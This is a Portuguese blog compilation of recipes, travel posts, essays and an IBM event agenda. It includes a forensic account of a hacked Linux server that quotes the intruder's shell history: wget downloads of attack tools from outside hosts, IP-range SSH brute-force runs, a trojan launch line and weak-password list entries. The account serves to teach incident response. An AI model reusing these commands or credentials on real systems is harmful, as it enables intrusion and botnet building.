
Palestrante: Avi Alkalay (IBM)

14h50 – 15h30 System i e JD Edwards: a combinação perfeita

Conheça a plataforma ideal para a solução de JD Edwards, o System i, dotado de tecnologia POWER. Possui alto poder de processamento, capacidades avançadas de virtualização e alocação dinâmica de recursos, além de ser uma máquina totalmente auto gerenciáve

Palestrante: Mauricio Conceição (IBM)

15h40 – 16h20 Otimize seu datacenter tirando o máximo de seu hardware

Conheça arquiteturas não-convencionais, mas que trazem benefícios financeiros enormes, para
virtualização, enjaulamento de aplicações, desktops multiusuários, clusters de alta disponibilidade, de custo baixo até os mais escaláveis, clusters para Grid e alta disponibilidade, e opções para desktop.

Palestrante: Avi Alkalay (IBM)

16h30 – 17h00 Parceiro: YKP

Conheças as Soluções CRM integradas ao JD Edwards

Palestrante: YKP

17h10 – 17h40 Soluções financeiras para viabilizar seu projeto

O Banco IBM apresenta uma série de alternativas para viabilizar seu projeto de TI. Conheça as melhores e mais variadas soluções financeiras para levar seu projeto adiante.

Palestrante: André Sales (IBM); Antonio Ramos (IBM)

Estando no evento, não deixe de passar no stand da IBM.

Receita de Sopa Fria de Pepino com Iogurte

Ingredientes

  • Pepinos compridos: 3
  • Copos de iogurtes: 2
  • Nozes picadas ou xerém de castanha de cajú: 150g
  • Dil (também conhecido por endro) picado: 2 colheres de sopa cheias
  • Alho amassado: 1 dente grande
  • Sal a gosto

Modo de Preparo

  1. Descasque e pique os pepinos em pedaços pequenos
  2. Junte os 2 copos de iogurte e mais 2 copos iguais de água
  3. Junte o alho amassado, a castanha de cajú ou nozes, e o dil
  4. Misture tudo e vá temperando com sal a gosto
  5. Deixe gelar na geladeira por meia hora

Serve 2 pessoas, em cumbuca e com colher de sopa. É leve, saudável e saboroso e as vezes só janto isso e fico satisfeito.

Algumas pessoas gostam de moer pimenta do reino sobre sua cumbuca, outras preferem regar um fio de azeite de oliva.

De qualquer forma, a impressão que se tem é que pepino, iogurte e alho nasceram para serem comidos juntos, de tanto que combinam.

Abraço dos Dois Irmãos

Sol atrás dos Dois IrmãosDescolei umas horas livres no fim da tarde, na praia de Ipanema.

Mergulhei perto do posto 8, no Arpoador. O mar estava pouco agitado mas muito gelado. Brrrrr: águas oceânicas.

O horário de verão terminou final de semana passado, então acho que estamos no outono. Nesta época o sol se põe exatamente atrás do Morro Dois Irmãos, que marca o fim do Leblon e o começo do Vidigal.

Conforme o sol ia baixando, formava dois enormes braços de raios com a sombra do morro no miolo. O efeito era os Dois Irmãos abraçando a cidade. Muito bonito e inspirador. E pelo jeito a cena já serviu de inspiração para outras pessoas.

Centro do mapa
no mapa
Morro Dois Irmãos
no mapa
Posto 8
no mapa
Arpoador

Enquanto assitia aquilo, parado, de pé no calçadão, pessoas passavam por mim. Um rapaz com camisa verde-amarela, andando de costas para o morro, tascou o último naco de seu espetinho-de-gato, e, exatamente em frente a um cesto de lixo grande, laranja e chamativo, lançou o espeto vazio ao ar. O espeto caiu na areia, e o papel que o envolvia foi para a calçada. Ele fez questão de não mirar no cesto !

O que faz um ser humano ter tal atitude? Ô povinho! Acabou com minha contemplação…

Mesmo assim o Rio de Janeiro continua lindo.

Nostalgia Titânica

Sabe, as vezes bate uma saudade dos velhos amigos. De épocas bem vividas. Não que os dias de hoje não sejam, mas em outros carnavais nossa mente estava em outra sintonia, que nos fazia levar a vida por caminhos diferentes.

Fico muito feliz quando conheço artistas e suas músicas que tocam minha alma diferente da média que a gente vai ouvindo por aí. Isso acontece poucas vezes por ano. E certos anos simplesmente não acontece.

Titane é uma cantora praticamente desconhecida que me levou para esse mundo da nostalgia. A saudade dos amigos que a gente pouco vê bate mais forte, ao mesmo tempo que rola uma esperança de estarmos mais próximos muito em breve.

Descobri suas músicas por aí, fui conhecendo mais e me encantei. Ela tem trabalhos que são deslumbrantes do começo ao fim. E que voz !

Zensider, de Edvaldo Santana e Ademir Assunção, era tocada às vezes na Rádio USP aqui em São Paulo, mas a Moda do Fim do Mundo, de Alice Ruiz e Chico César, do mesmo album mas jamais ouvida, é prá lá de mais interessante e melódica.

Curtam seus amigos. Agora, antes do fim do mundo.

Idealismo e Evolução

O idealismo está entre as coisas que mais faz o mundo andar para frente, e ao mesmo tempo, posiciona-se como a que mais segura a sua evolução.

O idealismo de mente aberta leva o mundo para frente. E o idealismo hermético, enclausurado, sem visão, fundamentalista, freia a evolução do mundo e da sociedade.

De qualquer forma, o idealismo como característica de personalidade, sempre vem empacotado com outras características, tais como falta de praticidade, um “não consigo terminar o que comecei”, e um altruismo que muitas vezes leva a irredutibilidade e, inevitavelmente, ao fundamentalismo.

Mas a visão mais ampla dos idealistas geralmente serve para inspirar pessoas de mente mais prática, menos cerebral, mais emocional, que pensa menos e faz mais, que enfim impulsionam a roda da história.

O progresso se faz com a mistura de personalidades idealistas (e teóricas) com as de tendência prática. Raros os líderes que tem ambas as características.

Os idealistas que enxergam 1000km no futuro e observam, durante a sua vida, a humanidade caminhar somente uns 2km para frente, devem se dar por satisfeitos. Esses 2km são exatamente o que a humanidade como um todo, hoje, é capaz de caminhar.

A evolução social, moral e benéfica não acontece a passos largos. Aos olhos dos impacientes parece até não acontecer. Mas na verdade nunca para e nunca anda para trás.

Segurança em Open Source

Cezar Taurion, excelente consultor e colega de trabalho, engatou seu blog no developerWorks. Gostaria de complementar seu artigo da Linux Magazine de dezembro de 2006 com algumas aspectos sobre segurança.

Não há como afirmar que Open Source é mais seguro que Closed Source, ou que Closed Source é mais seguro que Open Source. Quem o afirma, geralmente faz por religião e não por análise fria.

Considero-me especialista em segurança, mas evito ao máximo tocar neste assunto ao falar com clientes em geral, quando o âmbito é Open Source. Só quando eles perguntam. Simplesmente porque cada um terá uma opinião, e porque nehuma opinião pode ser verdadeiramente constatada.

Vamos dividir o mundo Open Source em dois blocos. No primeiro desfilam as escolas do grupo 1, campeões de audiência como o Apache HTTP Server, Samba, boa parte do Kernel, Bind, OpenSSH, DHCP, Firefox, OpenOffice.org, libc, que são arrasadoramente populares, e literalmente seguram a festa da Internet no ar. A lista não é muito maior que essa.

E no grupo 2 ficam todos os outros projetos Open Source, disputando um lugar ao sol e na passarela das distribuições Linux. Aqui estão as dezenas de milhares de projetos abandonados do SourceForge.net, e também projetos longe da criticidade das do grupo 1, mas já um pouco mais usados, como Gnome, KDE, X.org, a outra parte do Kernel, OpenLDAP, NAS, VNC, ImageMagick, Bash, Gimp, Kopete, Gaim, libc++, libxml, ntp, e mais todo o resto que não aparece no grupo 1 mas que está instalado aí no seu computador.

Enquanto pensamos que no closed source podem haver pontos inacessivelmente inseguros e backdoors, devemos também nos perguntar se há realmente pessoas analisando todo Open Source que interessa, com enfoque em segurança. Pense no grupo 2.

Sobre segurança em Open Source, a única coisa que podemos afirmar é que o código se mantém aberto para quem quiser auditá-lo (característica que o closed source não tem e nem quer ter). Mas novamente, isso não é garantia de que suas falhas serão achadas.

No grupo 1, dos superpopulares, a estória é outra. Eles são naturalmente submetidos a stress massivo e constante do mundo real. E a dependência que muitas empresas e indivíduos tem desse grupo os leva a se relacionar de forma simbiótica com sua evolução. Usam o fato de ter o fonte disponível para auditar e contribuir melhorias.

A separação entre os grupos não é tão nítida. Usei só para ilustrar. A fronteira é na verdade uma larga faixa de projetos Open Source com diferentes graduações de popularidade, stress e uso.

É preciso ter a soma de dois aspectos para se ter a melhor segurança: código fonte aberto + extrema popularidade, sendo o último mais importante (e mais difícil de alcançar) que o primeiro.

Um closed source também tem sua chance de ser seguro. Basta a empresa que o fabrica cuidar bem de seu produto. Se ele for popular, ela tende a cobrar menos para executar este trabalho. Se for menos popular, mas ainda desejado pelos clientes, seu preço tende a ser mais alto.

O nabo é dos NETs

Complementando a estória do Antônio “LedStyle” Cláudio, eu tenho NET de 200kbps em Higienópolis. É tão bom quanto 200kpbs conseguem ser.

Mas quero aumentar a velocidade, e depoimentos como o dele dão medo. O pior de tudo é o atendimento péssimo das centrais dessas prestadoras. E o serviço é bem caro, mas vamos dizer que atribuo isso ao fato de que custo de banda core no Brasil é caríssimo.

Diga-se de passagem, meu pai colocou 2mbps em casa, com NET Fone. Ele fez uma análise meticulosa das tarifas de ligação telefônica comparando outras operadoras, e disse que o preço do minuto NET é bem mais caro. A NET diz que é mais barato. Bem, isso é uma meia verdade, somente em alguns horários, para ligações locais muito curtas. Como diz o ditado, uma meia verdade é uma mentira.

Antes eu tinha o Giro, da Vesper/Embratel. 300kbps de baixa qualidade que vinham através de um modem sem fio que usava a infraestrutura CDMA da Vesper, e era conectado por USB no computador, e tinha suporte ruim para Linux.

Por ironia do destino, o atendimento telefônico do Giro da Vesper era ótimo. Atendentes sinceros, com bom conhecimento técnico e que retornavam ligações depois de fazer análises bem feitas. Fiz questão de registrar isso quando infelizmente cancelei o serviço porque sua tecnologia não me atendia.

Ponto de Luz

Queda d'água na pousadaDias atrás tirei umas férias curtas e resolvi conhecer o legendário Ponto de Luz, pousada zen na Serra da Mantiqueira, quase divisa entre São Paulo e Minas.

A viagem foi fácil, pela Rodovia Fernão Dias. Depois, uma bela estrada até Joanópolis e depois uns 19km de estrada de terra até a pousada. Este último trecho tem belas paisagens rurais de colinas, pomares e criação de gado. Há bastente gente morando ao longo da estrada. Havia muitas bifurcações e encruzilhadas, sempre sinalizadas com o caminho a se tomar para chegar a pousada. Saí às 11:00 de São Paulo e cheguei umas 13:30, prontinho para almoçar.

A pousada é propositadamente rústica-chique, como tantas outras por alí, em São Francisco Xavier, Gonçalves, Monteiro Lobato, etc. Como a região é montanhosa, é também cheia de rios, e a propriedade era cortada pelo Ribeirão da Vergem Escura (afluente da bacia do Rio Piracicaba) cujas pedras formavam um grande poço que convidava para um banho. Nos dias em que estive lá, a água estava um pouco barrenta por causa das chuvas, mas em outras épocas o rio tem águas cristalinas. Há um belo caminho aberto até o rio, e perto da margem colocaram uns assentos que serviam para nada além da pura contemplação da natureza.

Centro do Mapa
no mapa
Hotel Ponto de Luz

(interaja com o mapa)

Rede na varanda do quartoA grande sacada do arquiteto foi construir a pousada na encosta do morro. Isso funcionava bem para dar vista alta, de qualquer ponto da pousada, para o outro lado do rio e para colinas verdejantes e arborizadas. Inclusive do refeitório e da varanda dos quartos com sua rede de balanço.

E falando nisso, a comida era bem simples mas muito gostosa, essencialmente vegetariana, às vezes com uma opção de frango ou peixe. Sempre havia sobremesas dietéticas. O serviço era ótimo, atencioso, e a inclinação exotérica da pousada parecia plantar uma consciência holística nos funcionários.

Só o preço foi na minha opinião um pouco além da conta. R$204 pela diária, incluindo as 3 refeições mais o lanche da tarde. Por pessoa. Estou acostumado a viajar pela região e sei que os preços não são bem esses. Mas calculei que no valor há uma boa lapa de moda de turismo exotérico. Aí fiquei surpreso que no final ainda me convidaram a pagar 10% de taxa de serviço opcional que é dividida entre os funcionários no final do mês. Argumentei que a pousada como um todo já era um serviço, e que não fazia sentido uma taxa de serviço sobre um serviço que por sinal já estava bem pago. Acabei sucumbindo porque continuar a discussão ia ser constrangedor para a situação. Terminou mal explicado.

Havia uma agenda de atividades diárias, com caminhada leve de manhã, algum tipo de hidroginástica antes do almoço e meditação no fim do dia, logo depois do lanche da tarde. Experimentei lá, pela primeira vez, a meditação dinâmica, especialmente desenhada para pessoas estressadas da cidade grande, como eu. Bem legal. Mas, como toda meditação, exige disciplina para se fazer todos os dias. No segundo dia meditamos num pequeno templo charmoso, construido a toque de caixa para a visita de um guru indiano.

TerapiasDepois da meditação dava um pulo na piscina aquecida onde ficava de molho até a noite. O clima não estava convidativo para a piscina aberta e fria. O resto do tempo passava na rede da varanda do quarto, lendo, ouvindo música e observando as colinas tranqüilamente. Ou dava uma olhada na lojinha anexa, cheia de coisas no melhor estilo “além-da-lenda” (a coleção de CDs para vender era ótima, e levei alguns títulos). Ou ainda pode-se fazer uma das terapias e massagens disponíveis em seu cardápio de serviços, cobrados a parte, claro. Nos finais de semana parece que há palestras e atividades musicais, mas infelizmente não pude ficar para ver.

O pessoal da pousada conta que há hóspedes que reclamam que não há “nada” para fazer lá, nem telefone, nem TV, e acabam fugindo de volta para sua cidade agitada.

Bem, eu não sofro desse mal e ficaria lá pelo tempo que fosse, porque o Ponto de Luz é um lugar de paz contemplativa.

Receita de Quiabo Atomatado

Quiabos

Ingredientes

  • ½ kilo de quiabo, de preferência os menores
  • 2 latas de tomates inteiros despelados
  • ½ cebola picada
  • Azeite extra virgem
  • 2 pitadas de páprica picante (opcional)
  • Adoçante ou açucar
  • Sal a gosto

Modo de Preparo

  1. Limpe os quiabos removendo com uma faca a parte externa escura da circunferência de sua cabeça, mas não remova a cabeça inteira. Lave e deixe escorrer.
  2. Pique um pouco os tomates mas deixe pedaços para contarem a história.
  3. Refogue a cebola em um pouco de azeite e acrescente o purê de tomate.
  4. Adicione o quiabo, cortando os maiores no meio já sobre a panela.
  5. Adicione sal a gosto, a páprica picante, e umas 10 gotas de adoçante ou o equivalente em açucar.
  6. Adicione 2 dedos de água e misture bem. Cozinhe em fogo baixo, com a panela tampada por 15 minutos.
  7. Destampe, continue mexendo com fogo baixo por mais uns 15 minutos, até o tomate reduzir (secar) ao ponto de não sobrar molho mas só pedaços molhados de tomate.

A páprica picante combina muito bem com o leve sabor adocicado fortalecido pelo tomate. E o quiabo…. ah, o quiabo….

Sirva frio ou quente.

Na Trilha do Invasor

Qualquer administrador de firewall pode observar em seus registros que uma máquina conectada à Internet não fica um minuto sequer, 24 horas por dia, livre de tentativas de invasão. Tem sempre alguém fazendo uma varredura, tentando algum tipo estranho de conexão, requisitando URLs inseguras aos servidores web, enfim, batendo na porta. Parece que as pessoas têm se protegido bem já que não lembro de ter ouvido histórias detalhadas sobre um ataque efetivamente acontecendo.

Tive a oportunidade de analisar um computador que foi invadido e vou relatar aqui as evidências que os crackers deixaram para trás, como as descobrimos, e o que lhes interessava naquela máquina. Vou usar nomes fictícios e mascarar alguns IPs para resguardar a privacidade de todos.

Vamos chamar os invasores de crackers, porque hackers somos todos nós que respiramos tecnologia, “fuçadores” (tradução da palavra hacker), exploradores, pessoas curiosas. Somos todos hackers porque usamos nossas mentes poderosas para resolver problemas, ganhar dinheiro licitamente, enfim, fazer o bem. Um cracker por outro lado, usa seu conhecimento para invadir, deteriorar, tirar vantagem, e dar trabalho aos hackers administradores de redes. Um cracker é um mau hacker, e um bom hacker pode impedir a ação de um cracker.

Os Rastros Deixados pelo Cracker

O servidor em questão era uma máquina de testes internos na empresa A, que em determinado momento foi deslocada para um novo teste conectada à Internet, sem uma reinstalação. Tudo começou quando, poucas semanas após estar conectada à Internet, uma empresa que chamaremos de B, enviou um e-mail para P (provedor do link físico para a máquina atacada) informando que detectou uma tentativa de ataque, e requisitou um retorno. P encaminhou o e-mail para A, e esse continha alguns logs com a prova da tentativa de invasão:

Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:26:27 sshd[PID]: refused connect from  IP.IP.IP.IP

Eles mostravam que o IDS (Intrusion Detection System) de B acusou que a máquina atacada (cujo endereço IP está representado por IP.IP.IP.IP) tentou se logar várias vezes sem sucesso em seu serviço SSH (sshd). Reparem que o instante de todas as tentativas, até os segundos, é o mesmo, o que leva a crer que não é um ser humano, e sim algum software que muito rapidamente está testando várias combinações de usuário e senha ao mesmo tempo.

Histórico do Ataque

Fui chamado para dar explicações porque havia fornecido informalmente por telefone algumas dicas de como proteger a máquina. Primeiramente, era necessário dar subsídios ao provedor P para responder ao e-mail de B, dando uma satisfação formal. Isso é uma atitude de responsabilidade de um bom administrador de rede, e demonstra a preocupação em manter o nível de serviço da Internet o mais alto possível.

A máquina foi colocada em quarentena, desligada da Internet e começamos a analisá-la. Tratava-se de um Red Hat Enterprise Linux 3 Update 5. Não estou dizendo que o Red Hat Linux é menos ou mais seguro. Isso não é muito intuitivo de se entender, mas segurança não tem quase nada a ver com o software. Segurança não é um firewall, não é criptografia, nem um conjunto de produtos que tem proteção como objetivo. Segurança é um processo que deve ser seguido conscientemente por administradores de redes. Se um ataque acontece, toda a responsabilidade é do administrador, e não do sistema operacional, seja ele qual for, e do fabricante que for. O administrador precisava agora descobrir como o cracker invadiu para, corajosamente, assumir a falha e não permitir que isso aconteça novamente.

Logo no boot da máquina observamos consecutivas mensagens estranhas que não deviam estar lá e que continham o texto “(swap)”. Começamos a analisar o processo de inicialização do sistema, a partir do arquivo /etc/inittab. Vimos que um dos primeiros scripts que são executados no sistema é o /etc/init.d/functions e fizemos os seguintes testes:

bash$ rpm -qf /etc/init.d/functions
initscripts-7.93.20.EL
bash$ rpm -V initscripts
S.5....T c /etc/rc.d/init.d/functions

Verificamos que este arquivo faz parte (rpm -qf) do pacote initscripts, e em seguida testamos sua integridade (rpm -V). Descobrimos que o arquivo foi alterado: o número 5 significa que o MD5 do arquivo mudou, ou, em outras palavras, que o conteúdo do arquivo mudou. O RPM sabe disso comparando o MD5 do arquivo atual no disco, com o MD5 registrado em seu banco de dados no momento da instalação do pacote.

Mas o que foi alterado no script functions ?

A última linha do script era esta:

/usr/bin/crontabs -t1 -X53 -p

Suspeitamos imediatamente porque o comando crontab não se chama “crontabs”. Confirmamos novamente com o RPM:

bash$ rpm -qf /usr/bin/crontabs
o ficheiro /usr/bin/crontabs não pertence a nenhum pacote

Pronto. Estava constatado que esse tal comando crontabs era alienígena e não deveria estar ali. Foi, com certeza, implantado pelo cracker. Mas não paramos aqui. Queríamos saber o que este programa fazia. Como era um binário, tentamos extrair algumas strings dele:

bash$ strings /usr/bin/crontabs
[...]
"smbd -D"
"(swapd)" &
[...]

Ou seja, era este tal crontabs que mandava para a tela as mensagens com a string “(swap)”. Mas descobrimos outra coisa: o alienígena continha também a string “smbd -D”, que se parece com o nome do serviço do Samba. Nem perdemos tempo usando os comandos ps e top para verificar se um processo chamado smbd estava rodando porque usamos os mesmos rpm -qf e rpm -V para constatar que estes programas também foram modificados pelo cracker. Usamos o utilitário gráfico ksysguard (que não foi modificado) do KDE e pudemos observar um tal processo smbd -D rodando. Chamou a atenção que o ksysguard mostrava todos os processos executando sem seus parâmetros, e somente o smbd apresentava um parâmetro. Não tardou a acharmos um arquivo chamado “/usr/bin/smbd -D” (com espaço e parâmetro mesmo), e o RPM novamente nos informou que ele não fazia parte de nenhum pacote. Tratava-se de outro programa do cracker. Fomos lá tentar extrair mais algumas informações sobre este programa:

bash$ strings “/usr/bin/smbd -D"
[...]
Received SIGHUP; restarting.
Generating new %d bit RSA key.
RSA key generation complete.
   -b bits    Size of server RSA key (default: 768 bits)
By-ICE_4_All ( Hackers Not Allowed! )
SSH-%d.%d-%.50s
This server does not support your new ssh version.
Sent %d bit public key and %d bit host key.
sshd version %.100s [%.100s]
[...]

Omitimos diversas linhas para ser mais didático. A linha vermelha eliminou qualquer dúvida se um cracker havia visitado a máquina ou não. Mas o mais interessante são as linhas azuis, que levaram a crer que o famigerado programa smbd -D era um servidor SSH. O cracker deveria querer isso para manter um backdoor aberto, e poder logar com SSH quando quisesse. Em /var/log/messages encontramos a evidência final:

Feb  19 19:24:49 localhost smbd -D: RSA1 key generation succeeded
Feb  19 19:24:50 localhost smbd -D: RSA key generation succeeded
Feb  19 19:24:51 localhost smbd -D: DSA key generation succeeded
Feb  19 19:24:51 localhost smbd -D:  succeeded

Essas são mensagens típicas de um daemon SSH sendo executado pela primeira vez, quando cria suas chaves únicas de criptografia, só que bizarramente emitidas por um suposto programa com nome de Samba, o que não faz sentido algum e é forte indício que há algo errado no sistema. Ou seja, o cracker implantou um backdoor SSH, porém com um nome mascarado para seu arquivo e processo (smbd). A partir desses registros pudemos também estimar a data em que a máquina foi atacada: 19 de fevereiro.

Para o cracker poder alterar arquivos e comandos tão importantes do sistema, ele deve ter conseguido acesso de root, e por isso fomos espiar o histórico de comandos executados por este usuário no arquivo /root/.bash_history, e vimos isto:

bash# less /root/.bash_history
[...]
cd /usr/share/.a
wget lamisto.octopis.com/mig.tgz
tar xzvf mig.tgz
./mig g-u root -n 0
./mig -u root -n 0
cd /usr/share/.a
wget utilservices.iasi.rdsnet.ro/~marianu/flo.tgz
tar xzvf flo.tgz...linhas omitidas...
cd /var/tmp
wget djanda.com/get/usr.tar.gz
wget djanda.com/get/x.tar.gz
tar xfvz usr.tar.gz
cd usr
chmod +rwxrwxrwx *
./crond
cd ..
tar xfvz x.tar.gz
cd x
chmod +rwxrwxrwx *
mv unix x
./x 201.20; ./x 201.21; ./x 201.22; ./x 201.23; ./x 201.24; ./x 201.25; ./x 201. 26; ./x 201.27; ./x 201.28; ./x 201.29; ./x 201.30; ./x 201.31; ./x 201.32; ./x 201.33; ./x 201.34; ./x 201.35; ./x 201.36; ./x 201.37; ./x 201.38; ./x 201.39; ./x 201.40; ./x 201.41; ./x 201.42; ./x 201.43; ./x 201.44; ./x 201.45; ./x 201. 46; ./x 201.47; ./x 201.48; ./x 201.49; ./x 201.50
[...]
/usr/sbin/adduser scanning

O formato do arquivo não permite saber quando esses comandos foram executados, mas fica evidente que o cracker criou um usuário chamado scanning, baixou arquivos de certos sites, abriu-os e executou comandos que vieram com eles. Analisamos cada um, e descobrimos que:

  • No diretório /usr/share/.a ele instalou e executou o tal comando mig que aparentemente é um limpador de histórico de login do sistema. Usamos o mesmo comando strings para analisar esse binário. Isso confirmou nossa estimativa da data de ataque pois o comando last (usado para verificar esse histórico) apontou dados inconsistentes por volta de 19 de fevereiro.
  • Em /var/tmp foi baixado um tal usr.tar.gz, que aparentemente é um bot de IRC. Mais tarde, com os mesmos comandos do RPM, descobrimos que o comando /bin/netstat também foi alterado, provavelmente para esconder as conexões deste bot a diversos servidores de IRC na porta padrão 6667, o que constatamos com o ksysguard. Adiante explicaremos o que um cracker faz com isso.

Mas o mais interessante foi o x.tar.gz baixado. Continha dois executáveis chamados find e take, o script chamado simplesmente de x, e um arquivo muito especial de nome code.conf. Lendo o simplíssimo script x, vendo no histórico como ele era executado muitas vezes, e usando a intuição, ficou claro que o comando find varria faixas IP inteiras em busca de portas 22 (SSH) abertas. Os hosts encontrados eram então passados para o comando take, que se encarregava de usar as 18459 combinações de usuário e senha disponíveis no arquivo code.conf para tentar se logar nas máquinas encontradas. Um login bem sucedido tinha o IP, usuário e senha registrados num arquivo que indicaria ao cracker as próximas máquinas a invadir. E sim, este arquivo já tinha uma lista de hosts e respectivas senhas em que essas ferramentas conseguiram penetrar.

Foi exatamente esse procedimento de login por força bruta que foi detectado pelo IDS da empresa B, quando o servidor deles tentou ser invadido sem sucesso.

Quando chegamos a isso, ainda não estava claro como a máquina de A foi invadida. Estava checando se e como os administradores da máquina seguiram meus conselhos informais de segurança, verificando as regras de iptables, serviços ativos, etc. Parecia tudo correto, ou não alarmantemente errado. Foi quando demos uma olhada com mais atenção no conteúdo do code.conf e entre suas mais de 18 mil linhas encontramos estas:

root passw0rd
root pa55word
root pa55w0rd
sapdb sapdb
apache apache
apache 123456
apache2 apache
apache2 apache2
apache2 apache123

Enquanto varríamos o arquivo com os olhos, de repente o administrador da máquina colocou a mão na testa, e com voz de lamento nos contou que a senha de root era a manjadíssima passw0rd (com um algarismo zero no lugar da letra ‘o’)! O serviço SSH estava aberto e permitia login do root pela rede. Aquela máquina também tinha sido vítima do scan do cracker, e foi assim que ele entrou e ganhou poder total.

Eu conhecia várias máquinas formais e informais que implementaram aquele mesmo esquema de segurança que foi sugerido, estavam anos conectadas à Internet, e nunca sofreram ataques. Mas uma simples senha conhecida, bem típica de ambientes de testes onde várias pessoas compartilham acessos similares e informais às máquinas, foi o calcanhar de Aquiles da pilha de segurança. Isso confirma que ataques bem sucedidos são sempre responsabilidade do administrador, e nunca do software de segurança em especial.

A Reinstalação da Máquina

Depois de um ataque como esse, e depois do relatório conclusivo, a melhor coisa é limpar completamente o disco e partir para uma reinstalação completa. Desta vez acompanhei de perto a instalação, e seguimos algumas regras simples de segurança:

  • Só instalamos pacotes que sabíamos que seriam usados. Descartamos completamente a idéia de fazer uma instalação completa.
  • Depois de instalado, desligamos alguns serviços que sabíamos que não seriam usados, como NIS, Samba, Portmap, NFS. E se possível os desinstalávamos.
  • Criamos regras para o iptables fechando praticamente tudo menos as portas 80 (HTTP) e 443 (HTTPS).
  • Requisitamos ao provedor do link P que configurasse regras semelhante em seu roteador, formando um firewall duplo.
  • Por via das dúvidas, desabilitamos o acesso por SSH ao root, obrigando o administrador a se logar com um usuário qualquer e depois ganhar privilégios com o comando su. Isso funciona como uma restrição dupla para administrar a máquina.
  • E dessa vez foram usadas senhas decentes, bem difíceis, com letras, números, e que não eram derivadas de palavras óbvias.
  • As senhas só foram informadas verbalmente para poucas pessoas. Evitamos passar por e-mail.

Por que o Cracker Ataca ?

Uma coisa que vale explicar é o bot de IRC. Ele serve para fazer ataques de DDoS (Distributed Denial of Service). Um bot fica constantemente conectado a uma sala de IRC pré-definida. Depois de invadir várias máquinas e ativar os respectivos bots, o cracker entra nessa sala de IRC e tem ao seu dispor um exército de bots distribuídos programados para executar ações ao seu comando. O DDoS acontece quando o cracker, via comandos aos bots na sala de IRC, faz os computadores invadidos enviarem simultaneamente grandes pacotes de dados para algum site-vítima, escolhido pelo cracker. Naquele momento, o link do site-vítima fica sobrecarregado, e a sensação é que ele está fora do ar. Isso pode durar o tempo que o cracker desejar.
Ataque Distributed Denial of Service

Esse processo foi ricamente detalhado pelo dono de um desses site-vítima, em grc.com/dos/grcdos.htm, e é leitura obrigatória a qualquer um que se interessa por segurança.

Em todas as análises que fizemos, não encontramos nada de útil no ataque do cracker. A máquina estava conectada a outras redes, mas não pareciam interessá-lo. A única conclusão que pudemos chegar é que o cracker ataca por atacar, e depois usa seu ataque para atacar mais. Só. Simplesmente isso. Sim, porque as ferramentas, técnicas e rastros deixados mostram que ele provavelmente usou ferramentas criadas por outros, talvez seguindo uma documentação que mostra os comandos prontos, passo a passo. Sem saber direito o que estava fazendo. Sem objetivos “mitnickianos”, nem financeiros, nem algo que o exaltasse perante outros crackers.

Só Freud explica…

Como Enganar Seus Sentidos

  1. Arrume 3 bacias ou 3 recipientes em que caibam suas mãos
  2. Coloque água gelada numa, água quente (mas não pelando) em outra, e água normal na terceira
  3. Mergulhe a mão esquerda na de água gelada e a direita na quente, e espere 30 segundos
  4. Tire e mergulhe as duas mãos juntas na terceira bacia e somente usando seus sentidos diga se ela está quente ou fria
  5. Preste atenção na temperatura que cada mão sente

Crianças adoram esta experiência.

Para os adultos, esta experiência tem uma “moral da estória” que depois eu conto.

Receita de “Apio”

Esta receita chama-se Apio porque é assim que os búlgaros — prováveis inventores do preparo — a chamam, e por falta de um nome melhor. É um prato delicioso, fácil de fazer, leve, refrescante, e quem prova quer a receita.

Apio é aipo em ladino, espanhol etc. Aipo é a raiz do salsão, também conhecido como celery. É preciso um pouco de insistência para achá-lo nas feiras do Brasil.

Há dois tipos de salsão: o branco americano, e o mais escuro (com raiz ainda branca). É deste último que se aproveita os melhores aromas, e cujas folhas e caule emprestam mais sabor a molhos etc. O salsão branco quase não tem gosto, e dele não se usa a raiz.

Ingredientes

  • 3 raizes de aipo
  • 4 ou 5 cenouras médias
  • suco de 1 limão
  • 2 colheres de sopa de azeite virgem
  • Adoçante ou açúcar
  • Sal a gosto
  • Água

Modo de Preparo

  1. Descasque as raizes de aipo. Se você encontrar lesmas no meio, por favor remova-as se você for me convidar para jantar.
  2. Lave as raizes descascadas, fatie com meio centímetro de grossura ou menos, e corte no meio as fatias grandes. Vá juntando num recipiente com água para ajudar a não escurecer.
  3. Descasque as cenouras, fatie e junte para cozinhar numa panela grande com o azeite já quente. Vá mexendo.
  4. Escorra e junte o aipo fatiado nas cenouras que já devem estar meio cozidas.
  5. Misture bem adicionando 2 copos de água.
  6. Deixe ferver por uns 15 minutos em fogo baixo.
  7. Adicione sal a gosto, adoçante (umas 20 gotas ou o equivalente em açúcar) e o suco de limão. É importante ficar levemente doce.
  8. Deixe cozinhar por mais uns 5 minutos, até diminuir bastante a água, mas não completamente.
  9. Teste a dureza do aipo e cenoura para ver se estão prontos. Se precisar de mais tempo, garanta que há sempre um dedo de água no fundo da panela.

A cenoura tem duas missões nesta receita: emprestar sua cor vibrante ao prato e tomar emprestado o aroma delicado e exótico da raiz de aipo.

Sirva frio, possivelmente como uma deliciosa entrada. Isto é uma rara iguaria.

Open Source na Prática

O primeiro a propor a idéia de Open Source Software (OSS) foi Richard Stallman na década de 1970, que a formalizou, com a ajuda de alguns advogados, na famosa licença GPL.

Ninguém se interessou ou sequer ouviu falar sobre isso, até que em meados da década de 1990, tudo mudou com a vertiginosa popularização do Linux, sistema operacional OSS.

O termo popular “Software Livre” não é a melhor tradução de Open Source Software, cujo correto é Software de Código Fonte Aberto. É importante notar isso porque muitas vezes o termo é erradamente associado a idéia de não-proprietário, ou não-comercial. A verdade é que um software pode ter seu código fonte aberto mas ser comercial e/ou proprietário e vice-versa, portanto são conceitos que não devem ser confundidos.

A idéia é simples: eu escrevo um programa e você pode copiá-lo à vontade sem nem sequer me notificar. Pode inclusive modificá-lo e redistribuí-lo, contanto que também mantenha suas modificações abertas e informe qual a origem e os autores anteriores do software.

